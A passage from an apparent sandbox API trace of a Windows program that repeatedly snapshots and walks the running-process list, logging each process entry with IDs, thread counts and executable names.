lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, 
dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.492] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0107.493] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0107.494] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0107.494] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0107.557] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.558] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.558] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0107.559] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.560] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.561] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0107.561] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.562] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.563] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0107.564] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0107.565] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.567] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0107.568] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0107.569] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0107.570] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.571] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.573] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="fired-isolation-deny.exe")) returned 1 [0107.574] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0107.575] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0107.576] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0107.577] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0107.578] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0107.580] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0107.581] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0107.582] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0107.584] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0107.585] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0107.586] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0107.598] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0107.599] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0107.600] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0107.602] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0107.653] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0107.654] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0107.655] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0107.656] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0107.657] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.658] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0107.659] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0107.660] CloseHandle (hObject=0xbc) returned 1 [0107.660] Sleep (dwMilliseconds=0x12c) [0107.973] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0107.979] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.980] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0107.980] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0107.981] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.982] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, 
szExeFile="wininit.exe")) returned 1 [0107.983] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.984] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0107.984] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0107.985] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0107.986] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0107.987] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.988] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0107.988] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.989] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.989] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.990] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0107.991] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.992] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.993] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="spoolsv.exe")) returned 1 [0107.994] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.996] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.997] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0107.999] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.000] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.002] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.003] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, 
szExeFile="taskhost.exe")) returned 1 [0108.005] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0108.006] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0108.008] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0108.058] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0108.060] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0108.061] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0108.063] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0108.064] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0108.065] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0108.066] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0108.067] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0108.070] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0108.071] Process32NextW (in: 